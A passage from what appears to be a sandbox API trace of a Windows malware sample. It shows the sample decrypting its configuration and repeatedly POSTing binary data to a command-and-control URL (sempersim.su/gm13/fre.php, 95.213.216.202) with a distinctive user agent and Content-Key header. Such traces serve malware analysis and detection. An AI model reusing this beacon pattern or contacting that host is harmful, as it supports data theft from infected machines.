phKey=0x19fcac*=0x62d710) returned 1 [0240.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0240.610] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0240.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0240.610] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0240.611] GetProcessHeap () returned 0x620000 [0240.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0240.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0240.612] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643128, pdwDataLen=0x19fcfc | out: pbData=0x643128, pdwDataLen=0x19fcfc) returned 1 [0240.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0240.613] CryptDestroyKey (hKey=0x62d710) returned 1 [0240.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0240.614] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0240.614] GetProcessHeap () returned 0x620000 [0240.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646548 [0240.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0240.615] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0240.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0240.616] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0240.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0240.617] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0240.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0240.618] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0240.618] GetProcessHeap () returned 0x620000 [0240.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0240.618] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0240.618] GetProcessHeap () returned 0x620000 [0240.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0240.619] GetProcessHeap () returned 0x620000 [0240.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646548 | out: hHeap=0x620000) returned 1 [0240.619] GetProcessHeap () returned 0x620000 [0240.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0240.620] GetProcessHeap () returned 0x620000 [0240.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643170 [0240.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0240.623] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0240.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0240.630] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0240.640] GetProcessHeap () returned 0x620000 [0240.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0240.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0240.641] CryptImportKey (in: hProv=0x63bcb0, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0240.641] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0240.642] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0240.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0240.643] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0240.643] GetProcessHeap () returned 0x620000 [0240.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0240.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0240.644] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643170, pdwDataLen=0x19fcfc | out: pbData=0x643170, pdwDataLen=0x19fcfc) returned 1 [0240.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0240.645] CryptDestroyKey (hKey=0x62d190) returned 1 [0240.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0240.646] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0240.646] GetProcessHeap () returned 0x620000 [0240.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ed0 [0240.647] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0240.647] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0240.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0240.648] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0240.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0240.649] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0240.649] GetProcessHeap () returned 0x620000 [0240.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0240.649] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c2f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0240.651] GetProcessHeap () returned 0x620000 [0240.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b4e0 [0240.653] socket (af=2, type=1, protocol=6) returned 0x3bc [0240.653] connect (s=0x3bc, name=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0240.701] FreeAddrInfoW (pAddrInfo=0x63c2f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0240.701] GetProcessHeap () returned 0x620000 [0240.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0240.701] GetProcessHeap () returned 0x620000 [0240.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0240.702] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0240.703] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0240.703] GetProcessHeap () returned 0x620000 [0240.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0240.703] GetProcessHeap () returned 0x620000 [0240.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0240.703] GetProcessHeap () returned 0x620000 [0240.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643560 [0240.703] GetProcessHeap () returned 0x620000 [0240.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0240.704] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0240.705] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0240.705] GetProcessHeap () returned 0x620000 [0240.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0240.705] GetProcessHeap () returned 0x620000 [0240.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0240.705] send (s=0x3bc, buf=0x63a880*, len=237, flags=0) returned 237 [0240.706] send (s=0x3bc, buf=0x6421e0*, len=159, flags=0) returned 159 [0240.706] GetProcessHeap () returned 0x620000 [0240.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0240.706] recv (in: s=0x3bc, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0242.295] GetProcessHeap () returned 0x620000 [0242.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0242.295] GetProcessHeap () returned 0x620000 [0242.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643560 | out: hHeap=0x620000) returned 1 [0242.295] GetProcessHeap () returned 0x620000 [0242.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0242.295] GetProcessHeap () returned 0x620000 [0242.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0242.296] closesocket (s=0x3bc) returned 0 [0242.296] GetProcessHeap () returned 0x620000 [0242.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4e0 | out: hHeap=0x620000) returned 1 [0242.296] GetProcessHeap () returned 0x620000 [0242.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ed0 | out: hHeap=0x620000) returned 1 [0242.297] GetProcessHeap () returned 0x620000 [0242.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643170 | out: hHeap=0x620000) returned 1 [0242.297] GetProcessHeap () returned 0x620000 [0242.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0242.297] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14c) returned 0x3bc [0242.299] Sleep (dwMilliseconds=0xea60) [0242.311] GetProcessHeap () returned 0x620000 [0242.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6433f8 [0242.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0242.312] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0242.320] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0242.334] GetProcessHeap () returned 0x620000 [0242.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0242.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0242.335] CryptImportKey (in: hProv=0x63b7e8, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0242.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0242.335] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.336] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0242.336] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.336] GetProcessHeap () returned 0x620000 [0242.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0242.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0242.337] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6433f8, pdwDataLen=0x19fcfc | out: pbData=0x6433f8, pdwDataLen=0x19fcfc) returned 1 [0242.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0242.338] CryptDestroyKey (hKey=0x62d190) returned 1 [0242.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0242.339] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0242.339] GetProcessHeap () returned 0x620000 [0242.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645a80 [0242.347] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0242.348] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0242.348] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0242.349] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0242.349] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0242.350] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0242.350] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0242.351] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0242.351] GetProcessHeap () returned 0x620000 [0242.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0242.351] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0242.351] GetProcessHeap () returned 0x620000 [0242.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0242.351] GetProcessHeap () returned 0x620000 [0242.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645a80 | out: hHeap=0x620000) returned 1 [0242.352] GetProcessHeap () returned 0x620000 [0242.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6433f8 | out: hHeap=0x620000) returned 1 [0242.352] GetProcessHeap () returned 0x620000 [0242.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6435a8 [0242.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0242.353] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0242.366] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0242.378] GetProcessHeap () returned 0x620000 [0242.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0242.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0242.379] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0242.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0242.380] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0242.380] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.380] GetProcessHeap () returned 0x620000 [0242.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0242.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0242.382] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6435a8, pdwDataLen=0x19fcfc | out: pbData=0x6435a8, pdwDataLen=0x19fcfc) returned 1 [0242.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0242.383] CryptDestroyKey (hKey=0x62d190) returned 1 [0242.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0242.383] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0242.383] GetProcessHeap () returned 0x620000 [0242.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x6460f8 [0242.384] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0242.384] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0242.385] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0242.386] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0242.476] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0242.477] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0242.477] GetProcessHeap () returned 0x620000 [0242.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0242.477] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c410*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea90*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0242.479] GetProcessHeap () returned 0x620000 [0242.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b610 [0242.480] socket (af=2, type=1, protocol=6) returned 0x3c0 [0242.480] connect (s=0x3c0, name=0x63ea90*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0242.534] FreeAddrInfoW (pAddrInfo=0x63c410*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea90*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0242.534] GetProcessHeap () returned 0x620000 [0242.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0242.534] GetProcessHeap () returned 0x620000 [0242.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0242.535] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0242.536] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0242.536] GetProcessHeap () returned 0x620000 [0242.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0242.536] GetProcessHeap () returned 0x620000 [0242.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0242.537] GetProcessHeap () returned 0x620000 [0242.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6433f8 [0242.537] GetProcessHeap () returned 0x620000 [0242.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0242.538] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0242.538] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0242.538] GetProcessHeap () returned 0x620000 [0242.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0242.538] GetProcessHeap () returned 0x620000 [0242.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0242.539] send (s=0x3c0, buf=0x63a880*, len=237, flags=0) returned 237 [0242.539] send (s=0x3c0, buf=0x6421e0*, len=159, flags=0) returned 159 [0242.539] GetProcessHeap () returned 0x620000 [0242.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0242.539] recv (in: s=0x3c0, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0243.737] GetProcessHeap () returned 0x620000 [0243.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0243.738] GetProcessHeap () returned 0x620000 [0243.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6433f8 | out: hHeap=0x620000) returned 1 [0243.738] GetProcessHeap () returned 0x620000 [0243.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0243.738] GetProcessHeap () returned 0x620000 [0243.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0243.738] closesocket (s=0x3c0) returned 0 [0243.739] GetProcessHeap () returned 0x620000 [0243.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b610 | out: hHeap=0x620000) returned 1 [0243.739] GetProcessHeap () returned 0x620000 [0243.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6460f8 | out: hHeap=0x620000) returned 1 [0243.740] GetProcessHeap () returned 0x620000 [0243.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6435a8 | out: hHeap=0x620000) returned 1 [0243.740] GetProcessHeap () returned 0x620000 [0243.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0243.740] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x128) returned 0x3c0 [0243.742] Sleep (dwMilliseconds=0xea60) [0243.745] GetProcessHeap () returned 0x620000 [0243.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0243.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0243.746] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0243.752] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0243.759] GetProcessHeap () returned 0x620000 [0243.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0243.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0243.823] CryptImportKey (in: hProv=0x63ba08, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0243.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0243.824] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0243.825] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.825] GetProcessHeap () returned 0x620000 [0243.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0243.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0243.826] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19fcfc | out: pbData=0x643488, pdwDataLen=0x19fcfc) returned 1 [0243.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0243.827] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0243.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0243.828] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0243.828] GetProcessHeap () returned 0x620000 [0243.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645a80 [0243.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0243.829] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0243.829] LoadLibraryW 